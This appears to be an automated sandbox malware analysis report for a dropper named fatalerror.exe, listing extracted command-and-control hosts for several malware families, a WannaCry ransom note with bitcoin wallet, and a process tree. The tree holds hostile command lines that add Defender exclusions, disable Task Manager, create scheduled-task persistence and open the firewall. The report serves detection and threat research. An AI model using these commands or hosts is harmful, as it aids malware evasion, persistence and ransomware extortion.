modiloader | 1d2822a34aa548e8e890e33b66cf6722e0bdb82944dae1b53feaf902790c5254

Resubmissions

11-04-2024 15:50

240411-tacvysaa6y 10

11-04-2024 14:37

240411-ry8lesde42 10

09-04-2024 17:30

240409-v3hscaha8y 10

08-01-2024 17:24

240108-vy3xqaecgj 10

Analysis

max time kernel
216s
max time network
217s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09-04-2024 17:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fatalerror.exe
Size

19.9MB
MD5

62df3bbc2aaeddab1942f1ed0b2db429
SHA1

a31b35f778fa5bec3a09b215db38d891fa45510d
SHA256

1d2822a34aa548e8e890e33b66cf6722e0bdb82944dae1b53feaf902790c5254
SHA512

6ab2b5f72db8b6e386c142e330807bd2eec9983c04ab034c4011c053a5be0294514f06693c66a9f8b6bcc7b60d1646810f7c2cda4379b6cdbda2f9d5d047bfdd
SSDEEP

393216:jDLmcuBUDiQv3FlGzbhweRo3W6aJZCN7TW/0k6CN1VWtES:jflGw3F6dwijJZCN2sA1Vc

Score

10^/10

modiloader sality smokeloader wannacry xtremerat xworm zgrat backdoor discovery evasion persistence ransomware rat spyware trojan upx worm

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

TcK6iKFmjhETcMYi

Attributes

install_file
USB.exe
pastebin_url
https://pastebin.com/raw/RqgnZ1zk

aes.plain

Extracted

Family

xworm

tr1.localto.net:39186

Attributes

Install_directory
%ProgramData%
install_file
Microsoft Storge.exe

Extracted

Family

sality

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

Extracted

Family

xtremerat

antonioxx.no-ip.org

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Path

C:\Users\Admin\Desktop\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Detect XtremeRAT payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2800-164-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral1/memory/2800-162-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral1/memory/1868-172-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral1/memory/2800-184-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat
behavioral1/memory/1868-182-0x0000000010000000-0x0000000010060000-memory.dmp	family_xtremerat

Detect Xworm Payload 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Synapse X.exe	family_xworm
behavioral1/memory/2080-30-0x00000000001B0000-0x00000000001C0000-memory.dmp	family_xworm
behavioral1/memory/4056-34-0x000001CB0C0D0000-0x000001CB0C0E0000-memory.dmp	family_xworm
C:\Users\Admin\Desktop\XClient.exe	family_xworm
behavioral1/memory/4844-86-0x0000000000750000-0x0000000000784000-memory.dmp	family_xworm

Detect ZGRat V1 1 IoCs

Processes:

resource	yara_rule
C:\Recovery\WindowsRE\cmd.exe	family_zgrat_v1

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Sality
Sality is backdoor written in C++, first discovered in 2003.
backdoor sality
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
XtremeRAT
The XtremeRAT was developed by xtremecoder and has been available since at least 2010, and written in Delphi.
persistence spyware rat xtremerat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

ModiLoader Second Stage 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\ayhost.exe	modiloader_stage2
behavioral1/memory/4860-434-0x0000000000400000-0x0000000000417000-memory.dmp	modiloader_stage2

Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

2804 netsh.exe

pid	process
2804	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

fatalerror.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	fatalerror.exe

Executes dropped EXE 6 IoCs

Processes:

Synapse X.exeTrihydridoarsenic.exeXClient.exe0x000a0000000133a8-19.exe01b33cd3304bbf320de06b217770cc59.exe01b33cd3304bbf320de06b217770cc59.exe

pid	process
2080	Synapse X.exe
336	Trihydridoarsenic.exe
4844	XClient.exe
3860	0x000a0000000133a8-19.exe
5108	01b33cd3304bbf320de06b217770cc59.exe
2800	01b33cd3304bbf320de06b217770cc59.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

5460 icacls.exe

pid	process
5460	icacls.exe

UPX packed file 22 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2800-156-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral1/memory/2800-159-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral1/memory/2800-160-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral1/memory/2800-161-0x0000000002370000-0x00000000033FE000-memory.dmp	upx
behavioral1/memory/2800-164-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral1/memory/2800-162-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral1/memory/2800-166-0x0000000002370000-0x00000000033FE000-memory.dmp	upx
behavioral1/memory/2800-167-0x0000000002370000-0x00000000033FE000-memory.dmp	upx
behavioral1/memory/2800-174-0x0000000002370000-0x00000000033FE000-memory.dmp	upx
behavioral1/memory/1868-172-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral1/memory/2800-179-0x0000000002370000-0x00000000033FE000-memory.dmp	upx
behavioral1/memory/2800-184-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral1/memory/1868-182-0x0000000010000000-0x0000000010060000-memory.dmp	upx
behavioral1/memory/4696-427-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral1/memory/4696-426-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral1/memory/4696-438-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral1/memory/4696-435-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral1/memory/336-545-0x0000000006030000-0x00000000070BE000-memory.dmp	upx
behavioral1/memory/336-547-0x0000000006030000-0x00000000070BE000-memory.dmp	upx
behavioral1/memory/336-625-0x0000000006030000-0x00000000070BE000-memory.dmp	upx
behavioral1/memory/336-635-0x0000000006030000-0x00000000070BE000-memory.dmp	upx
C:\Users\Admin\Desktop\Hydromatic.exe	upx

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

fatalerror.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Synapse X = "C:\\Users\\Admin\\Desktop\\Synapse X.exe"	fatalerror.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trihydridoarsenic = "C:\\Users\\Admin\\Desktop\\Trihydridoarsenic.exe"	fatalerror.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\Desktop\\XClient.exe"	fatalerror.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0x000a0000000133a8-19 = "C:\\Users\\Admin\\Desktop\\0x000a0000000133a8-19.exe"	fatalerror.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\01b33cd3304bbf320de06b217770cc59 = "C:\\Users\\Admin\\Desktop\\01b33cd3304bbf320de06b217770cc59.exe"	fatalerror.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

21 pastebin.com
23 pastebin.com
29 5.tcp.eu.ngrok.io
72 5.tcp.eu.ngrok.io
157 5.tcp.eu.ngrok.io
241 5.tcp.eu.ngrok.io
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

01b33cd3304bbf320de06b217770cc59.exe

description pid process target process

PID 5108 set thread context of 2800 5108 01b33cd3304bbf320de06b217770cc59.exe 01b33cd3304bbf320de06b217770cc59.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
21	pastebin.com
23	pastebin.com
29	5.tcp.eu.ngrok.io
72	5.tcp.eu.ngrok.io
157	5.tcp.eu.ngrok.io
241	5.tcp.eu.ngrok.io

flow	ioc
15	ip-api.com

description	pid	process	target process
PID 5108 set thread context of 2800	5108	01b33cd3304bbf320de06b217770cc59.exe	01b33cd3304bbf320de06b217770cc59.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1224	1868	WerFault.exe	svchost.exe
2920	1868	WerFault.exe	svchost.exe
1000	4696	WerFault.exe	ayhost.exe
2228	1368	WerFault.exe	2door.exe
5880	3932	WerFault.exe	2MASS J07225830-2546030.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4220 schtasks.exe
2960 schtasks.exe
5820 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

1680 tasklist.exe
2756 tasklist.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

NETSTAT.EXE

pid process

6104 NETSTAT.EXE
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2180 reg.exe
7096 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

5396 notepad.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

4928 PING.EXE
6372 PING.EXE
3276 PING.EXE

pid	process
4220	schtasks.exe
2960	schtasks.exe
5820	schtasks.exe

pid	process
1680	tasklist.exe
2756	tasklist.exe

pid	process
6104	NETSTAT.EXE

pid	process
2180	reg.exe
7096	reg.exe

pid	process
5396	notepad.exe

pid	process
4928	PING.EXE
6372	PING.EXE
3276	PING.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4964	powershell.exe
4964	powershell.exe
4056	powershell.exe
4056	powershell.exe
3408	powershell.exe
3408	powershell.exe
4548	powershell.exe
4548	powershell.exe
3584	powershell.exe
3584	powershell.exe
2972	powershell.exe
2972	powershell.exe
2972	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exeXClient.exepowershell.exepowershell.exeSynapse X.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeDebugPrivilege	4844	XClient.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	2080	Synapse X.exe
Token: SeDebugPrivilege	2972	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

01b33cd3304bbf320de06b217770cc59.exe

pid process

5108 01b33cd3304bbf320de06b217770cc59.exe

pid	process
5108	01b33cd3304bbf320de06b217770cc59.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

fatalerror.exe01b33cd3304bbf320de06b217770cc59.exe

description	pid	process	target process
PID 2528 wrote to memory of 4964	2528	fatalerror.exe	powershell.exe
PID 2528 wrote to memory of 4964	2528	fatalerror.exe	powershell.exe
PID 2528 wrote to memory of 2080	2528	fatalerror.exe	Synapse X.exe
PID 2528 wrote to memory of 2080	2528	fatalerror.exe	Synapse X.exe
PID 2528 wrote to memory of 4056	2528	fatalerror.exe	powershell.exe
PID 2528 wrote to memory of 4056	2528	fatalerror.exe	powershell.exe
PID 2528 wrote to memory of 336	2528	fatalerror.exe	Trihydridoarsenic.exe
PID 2528 wrote to memory of 336	2528	fatalerror.exe	Trihydridoarsenic.exe
PID 2528 wrote to memory of 336	2528	fatalerror.exe	Trihydridoarsenic.exe
PID 2528 wrote to memory of 3408	2528	fatalerror.exe	powershell.exe
PID 2528 wrote to memory of 3408	2528	fatalerror.exe	powershell.exe
PID 2528 wrote to memory of 4844	2528	fatalerror.exe	XClient.exe
PID 2528 wrote to memory of 4844	2528	fatalerror.exe	XClient.exe
PID 2528 wrote to memory of 4548	2528	fatalerror.exe	WerFault.exe
PID 2528 wrote to memory of 4548	2528	fatalerror.exe	WerFault.exe
PID 2528 wrote to memory of 3860	2528	fatalerror.exe	0x000a0000000133a8-19.exe
PID 2528 wrote to memory of 3860	2528	fatalerror.exe	0x000a0000000133a8-19.exe
PID 2528 wrote to memory of 3860	2528	fatalerror.exe	0x000a0000000133a8-19.exe
PID 2528 wrote to memory of 3584	2528	fatalerror.exe	powershell.exe
PID 2528 wrote to memory of 3584	2528	fatalerror.exe	powershell.exe
PID 2528 wrote to memory of 5108	2528	fatalerror.exe	01b33cd3304bbf320de06b217770cc59.exe
PID 2528 wrote to memory of 5108	2528	fatalerror.exe	01b33cd3304bbf320de06b217770cc59.exe
PID 2528 wrote to memory of 5108	2528	fatalerror.exe	01b33cd3304bbf320de06b217770cc59.exe
PID 2528 wrote to memory of 2972	2528	fatalerror.exe	powershell.exe
PID 2528 wrote to memory of 2972	2528	fatalerror.exe	powershell.exe
PID 5108 wrote to memory of 2800	5108	01b33cd3304bbf320de06b217770cc59.exe	01b33cd3304bbf320de06b217770cc59.exe
PID 5108 wrote to memory of 2800	5108	01b33cd3304bbf320de06b217770cc59.exe	01b33cd3304bbf320de06b217770cc59.exe
PID 5108 wrote to memory of 2800	5108	01b33cd3304bbf320de06b217770cc59.exe	01b33cd3304bbf320de06b217770cc59.exe
PID 5108 wrote to memory of 2800	5108	01b33cd3304bbf320de06b217770cc59.exe	01b33cd3304bbf320de06b217770cc59.exe
PID 5108 wrote to memory of 2800	5108	01b33cd3304bbf320de06b217770cc59.exe	01b33cd3304bbf320de06b217770cc59.exe
PID 5108 wrote to memory of 2800	5108	01b33cd3304bbf320de06b217770cc59.exe	01b33cd3304bbf320de06b217770cc59.exe
PID 5108 wrote to memory of 2800	5108	01b33cd3304bbf320de06b217770cc59.exe	01b33cd3304bbf320de06b217770cc59.exe
PID 5108 wrote to memory of 2800	5108	01b33cd3304bbf320de06b217770cc59.exe	01b33cd3304bbf320de06b217770cc59.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

5452 attrib.exe
4344 attrib.exe

pid	process
5452	attrib.exe
4344	attrib.exe

C:\Users\Admin\AppData\Local\Temp\fatalerror.exe
"C:\Users\Admin\AppData\Local\Temp\fatalerror.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Synapse X.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4964
- C:\Users\Admin\Desktop\Synapse X.exe
  "C:\Users\Admin\Desktop\Synapse X.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Synapse X.exe'
    3⤵
    PID:888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Synapse X.exe'
    3⤵
    PID:3732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Trihydridoarsenic.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4056
- C:\Users\Admin\Desktop\Trihydridoarsenic.exe
  "C:\Users\Admin\Desktop\Trihydridoarsenic.exe"
  2⤵
  - Executes dropped EXE
  PID:336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD hkcu\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t reg_dword /d 1 /f
    3⤵
    PID:1224
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD hkcu\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t reg_dword /d 1 /f
      4⤵
      Modifies registry key
      PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c start mspaint
    3⤵
    PID:1720
  - - C:\Windows\SysWOW64\mspaint.exe
      mspaint
      4⤵
      PID:3620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c start taskmgr
    3⤵
    PID:6844
  - - C:\Windows\SysWOW64\Taskmgr.exe
      taskmgr
      4⤵
      PID:6480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mountvol a: /d
    3⤵
    PID:4320
  - - C:\Windows\SysWOW64\mountvol.exe
      mountvol a: /d
      4⤵
      PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mountvol b: /d
    3⤵
    PID:5032
  - - C:\Windows\SysWOW64\mountvol.exe
      mountvol b: /d
      4⤵
      PID:2640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XClient.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3408
- C:\Users\Admin\Desktop\XClient.exe
  "C:\Users\Admin\Desktop\XClient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4844
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Storge" /tr "C:\ProgramData\Microsoft Storge.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\0x000a0000000133a8-19.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4548
- C:\Users\Admin\Desktop\0x000a0000000133a8-19.exe
  "C:\Users\Admin\Desktop\0x000a0000000133a8-19.exe"
  2⤵
  - Executes dropped EXE
  PID:3860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3584
- C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe
  "C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:5108
- - C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe
    "C:\Users\Admin\Desktop\01b33cd3304bbf320de06b217770cc59.exe"
    3⤵
    - Executes dropped EXE
    PID:2800
  - - C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      4⤵
      PID:1868
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 488
        5⤵
        Program crash
        
        PID:1224
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 520
        5⤵
        Program crash
        
        PID:2920
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:1624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\01c06da01d03aba73f575da905366dad.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2972
- C:\Users\Admin\Desktop\01c06da01d03aba73f575da905366dad.exe
  "C:\Users\Admin\Desktop\01c06da01d03aba73f575da905366dad.exe"
  2⤵
  PID:4872
- - C:\Users\Admin\d3s3Jf2gX6.exe
    C:\Users\Admin\d3s3Jf2gX6.exe
    3⤵
    PID:3244
  - - C:\Users\Admin\ttpiiy.exe
      "C:\Users\Admin\ttpiiy.exe"
      4⤵
      PID:2692
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c tasklist&&del d3s3Jf2gX6.exe
      4⤵
      PID:4212
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:1680
- - C:\Users\Admin\ayhost.exe
    C:\Users\Admin\ayhost.exe
    3⤵
    PID:4860
  - - C:\Users\Admin\ayhost.exe
      ayhost.exe
      4⤵
      PID:4696
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 236
        5⤵
        Program crash
        
        PID:1000
- - C:\Users\Admin\bahost.exe
    C:\Users\Admin\bahost.exe
    3⤵
    PID:4932
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:2148
- - C:\Users\Admin\djhost.exe
    C:\Users\Admin\djhost.exe
    3⤵
    PID:2484
- - C:\Users\Admin\ekhost.exe
    C:\Users\Admin\ekhost.exe
    3⤵
    PID:5852
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c tasklist&&del 01c06da01d03aba73f575da905366dad.exe
    3⤵
    PID:220
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\2door.exe'
  2⤵
  PID:1592
- C:\Users\Admin\Desktop\2door.exe
  "C:\Users\Admin\Desktop\2door.exe"
  2⤵
  PID:1612
- - C:\Users\Admin\Desktop\2door.exe
    "C:\Users\Admin\Desktop\2door.exe"
    3⤵
    PID:1368
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 332
      4⤵
      Program crash
      PID:2228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\2MASS J07225830-2546030.exe'
  2⤵
  PID:1764
- C:\Users\Admin\Desktop\2MASS J07225830-2546030.exe
  "C:\Users\Admin\Desktop\2MASS J07225830-2546030.exe"
  2⤵
  PID:3932
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 696
    3⤵
    - Program crash
    PID:5880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\3e71d2e715046c0f2e8241cdccbefe4b.exe'
  2⤵
  PID:4564
- C:\Users\Admin\Desktop\3e71d2e715046c0f2e8241cdccbefe4b.exe
  "C:\Users\Admin\Desktop\3e71d2e715046c0f2e8241cdccbefe4b.exe"
  2⤵
  PID:3024
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WjWgdwObUx" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF8B.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:5820
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:5208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\8A184A4C0C3FBB38A42095F653EA1063A07F75D3DE1A1.exe'
  2⤵
  PID:2108
- C:\Users\Admin\Desktop\8A184A4C0C3FBB38A42095F653EA1063A07F75D3DE1A1.exe
  "C:\Users\Admin\Desktop\8A184A4C0C3FBB38A42095F653EA1063A07F75D3DE1A1.exe"
  2⤵
  PID:5004
- - C:\Users\Admin\AppData\Roaming\SearchHost.exe
    "C:\Users\Admin\AppData\Roaming\SearchHost.exe"
    3⤵
    PID:2204
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\SearchHost.exe" "SearchHost.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:2804
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 1456
      4⤵
      PID:6956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe'
  2⤵
  PID:2204
- C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe
  "C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe"
  2⤵
  PID:4888
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\Admin\AppData\Local\Temp\\gvmxo.exe "C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe"
    3⤵
    PID:3092
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 2
      4⤵
      Runs ping.exe
      PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\gvmxo.exe
      C:\Users\Admin\AppData\Local\Temp\\gvmxo.exe "C:\Users\Admin\Desktop\87450041fd9f8909f7b340844bfa48ff03b2eb4a85064ce3a13b3ff5022ba94b.exe"
      4⤵
      PID:4800
    - - \??\c:\Program Files\kbyfbk\nhpn.exe
        
        "c:\Program Files\kbyfbk\nhpn.exe" "c:\Program Files\kbyfbk\nhpnp.dll",Compliance C:\Users\Admin\AppData\Local\Temp\gvmxo.exe
        5⤵
        
        PID:4288
